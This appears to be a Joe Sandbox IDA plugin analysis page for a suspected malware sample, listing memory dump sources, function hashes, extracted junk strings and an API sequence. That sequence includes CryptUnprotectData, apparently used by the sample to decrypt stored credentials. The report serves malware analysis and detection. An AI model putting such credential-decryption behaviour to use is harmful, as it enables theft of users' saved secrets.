expected a Time entry, xrefs: 6CB22E36
(root), xrefs: 6CB2354F

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 9a8d3b2dc3136446502885534dbab3ff24b211533be0f6b1734b09f51ed5e41e
Instruction ID: cc1f22e8813de4c602b730561888aa8a787efc50ba0746e75e2e21d0938e7fc1
Opcode Fuzzy Hash: 9a8d3b2dc3136446502885534dbab3ff24b211533be0f6b1734b09f51ed5e41e
Instruction Fuzzy Hash: D591BF706087C08FC724CF24C4956AFBBE5EF89268F50892DE59A8B750DB38D949CB53

Function 00E8632C Relevance: 11.6, Strings: 8, Instructions: 1620COMMON

Download Yara Rule

Strings

3jn, xrefs: 00E8736C
Fh_, xrefs: 00E86D71
IA~, xrefs: 00E866D6
T2o, xrefs: 00E86929
m, xrefs: 00E8649F
s}, xrefs: 00E8704F
_~M, xrefs: 00E86766
)ws, xrefs: 00E86DB8

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )ws$3jn$Fh_$IA~$T2o$_~M$s}$m
API String ID: 0-426242571
Opcode ID: 7e5587903ad96cb2f87821030879aa8aad951e30646aeb7452f476949d8f29c8
Instruction ID: 064d2a310455097e51b223307a277562e428d89270a9556bacbd98d032fb6e29
Opcode Fuzzy Hash: 7e5587903ad96cb2f87821030879aa8aad951e30646aeb7452f476949d8f29c8
Instruction Fuzzy Hash: F8B2D7F360C2149FE304AE2DEC8567ABBE9EFD4320F16893DE6C5C3744EA3558058696

Function 00E7C482 Relevance: 11.5, Strings: 8, Instructions: 1489COMMON

Download Yara Rule

Strings

xw{, xrefs: 00E7C6B8
xw{, xrefs: 00E7C770, 00E7C7AD
;Dzm, xrefs: 00E7C5EC
ioo, xrefs: 00E7C821
V^, xrefs: 00E7CA30
d, xrefs: 00E7D1A2
K ?', xrefs: 00E7C96B
`Wp", xrefs: 00E7CF3A

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ;Dzm$K ?'$V^$`Wp"$ioo$xw{$xw{$d
API String ID: 0-1231755633
Opcode ID: f5b898470cdfd91227c02163505fe2f54ada5142bdcb03cfc17650bb68f0ab70
Instruction ID: 83bfbe2ddd324a743d629a4f7c18a564482ee39c74f687bbdd3eb9d78a2d2d75
Opcode Fuzzy Hash: f5b898470cdfd91227c02163505fe2f54ada5142bdcb03cfc17650bb68f0ab70
Instruction Fuzzy Hash: 2AA2D3F3A0C604AFE3046E29EC8567AFBE5EF94720F16893DEAC483740E63558458797

Function 6CADD4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

, xrefs: 6CADDA88
@, xrefs: 6CADDAF6
-, xrefs: 6CADD7DD
0, xrefs: 6CADD852
1, xrefs: 6CADDBDD
9, xrefs: 6CADDE7F
8, xrefs: 6CADDC08
0, xrefs: 6CADDC7F

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f83db76c67a4a8b28b2a950b4ab1f9327c040f545f54e671be3e56024bb81ef0
Instruction ID: 66a579a8e06fe43f9b1e1f370b6179cf729a35037e0ff385c592d60af16c2bd2
Opcode Fuzzy Hash: f83db76c67a4a8b28b2a950b4ab1f9327c040f545f54e671be3e56024bb81ef0
Instruction Fuzzy Hash: 8762BD70A1C3458FD701CE29C49075EBBF2AF86318F1A4A4DE4E54BA91C335A9C5CFA2

Function 00E7F936 Relevance: 10.4, Strings: 7, Instructions: 1613COMMON

Download Yara Rule

Strings

^?r], xrefs: 00E80503
!>S[, xrefs: 00E7FD18
AZu, xrefs: 00E80510
T"/, xrefs: 00E80321
T"/, xrefs: 00E80332
EpQ>, xrefs: 00E80548
xA_w, xrefs: 00E7FB15

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !>S[$AZu$EpQ>$T"/$T"/$^?r]$xA_w
API String ID: 0-3145663435
Opcode ID: 14de5d5a14934a1658666e644ed058c9bc5eb55511c0808d9772b07c5fd8e374
Instruction ID: 3f51c99e8adc219a065a0375645a89c5b3be0d62fba88d8a69b17766c4938ebd
Opcode Fuzzy Hash: 14de5d5a14934a1658666e644ed058c9bc5eb55511c0808d9772b07c5fd8e374
Instruction Fuzzy Hash: 87B219F360C204AFE7046E2DEC8567ABBD9EF94320F1A463DEAC4C7744EA3558058697

Function 00E87D5A Relevance: 9.1, Strings: 6, Instructions: 1623COMMON

Download Yara Rule

Strings

<<y, xrefs: 00E88CFF
aLz, xrefs: 00E880DD
%X;), xrefs: 00E8906B
\[g6, xrefs: 00E882E4
tx=, xrefs: 00E87E54
V&, xrefs: 00E87F89

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %X;)$<<y$\[g6$aLz$tx=$V&
API String ID: 0-4064881564
Opcode ID: 03fc29c37e65d326e2705ede567a767fd383914c5a19be251315fbceb0643198
Instruction ID: d920d4d8a744de975b38de864cad780d4dd41c434ab3fbea82afd7457d257c7f
Opcode Fuzzy Hash: 03fc29c37e65d326e2705ede567a767fd383914c5a19be251315fbceb0643198
Instruction Fuzzy Hash: D6B208F3A0C2049FE304AE2DEC8577ABBE9EF94720F16453DEAC4C7744EA3558058696

Function 00E8B23F Relevance: 9.1, Strings: 6, Instructions: 1618COMMON

Download Yara Rule

Strings

l}j, xrefs: 00E8BBC7
iZY5, xrefs: 00E8B356
@SO, xrefs: 00E8BE10
;o;{, xrefs: 00E8B992
%X/n, xrefs: 00E8B7BF
*A|, xrefs: 00E8BF97

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %X/n$*A|$;o;{$@SO$iZY5$l}j
API String ID: 0-4130925060
Opcode ID: b3b0efa1a2ea8b47431239b31daedd8738a3469a5ec9b64e9019781d29a0d807
Instruction ID: f6a99218e18098c7e3a783772d48f3114010d10b082bd41a60a605eb05e37b39
Opcode Fuzzy Hash: b3b0efa1a2ea8b47431239b31daedd8738a3469a5ec9b64e9019781d29a0d807
Instruction Fuzzy Hash: 68B204B3A0C2109FE3046E29DC8567AFBE9EF94320F1A492DEAC5D7744EA3558018797

Function 00E772A1 Relevance: 9.1, Strings: 6, Instructions: 1579COMMON

Download Yara Rule

Strings

hWDk, xrefs: 00E783C6
LX~g, xrefs: 00E77636
As{, xrefs: 00E773E5
wDuj, xrefs: 00E7734A
jvn, xrefs: 00E7779D
v)_, xrefs: 00E775DC

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: As{$LX~g$hWDk$jvn$v)_$wDuj
API String ID: 0-3858004776
Opcode ID: 6ed48c1a70ff5dd55687ef04826f654ec4d0fea98630121f399c977428216c38
Instruction ID: 07dbb5e5d3b29068c9a4ad5dc626f6a9b7e1bdcae1064b01aa3abfc96b20178d
Opcode Fuzzy Hash: 6ed48c1a70ff5dd55687ef04826f654ec4d0fea98630121f399c977428216c38
Instruction Fuzzy Hash: DDB2E6F360C2049FE3056E29EC4567ABBE9EBD4720F1A893DEAC483744EA3558058697

Function 00AB7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AB724D
RtlAllocateHeap.NTDLL(00000000), ref: 00AB7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AB7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AB72A4
LocalFree.KERNEL32(?), ref: 00AB72AE

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: dd48fcb1f3c9cd282fd367d6d7481eb78ec412bfbcfde4f27dbd0caadc59af55
Instruction ID: 83e69c8c64f6b08e8daf275ae67fdd0cba5f8a545707b8c9af9564b936f88924
Opcode Fuzzy Hash: dd48fcb1f3c9cd282fd367d6d7481eb78ec412bfbcfde4f27dbd0caadc59af55
Instruction Fuzzy Hash: 120112B5A40208BBDB14DFE4CD45FADB778EB44704F104155FB09AB2C0D6B0AA00CB66

Function 00E8142A Relevance: 6.6, Strings: 4, Instructions: 1623COMMON

Download Yara Rule

Strings

YT[m, xrefs: 00E81BCA
_R]q, xrefs: 00E822D6
5t, xrefs: 00E81FC4
mpw|, xrefs: 00E815FB

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
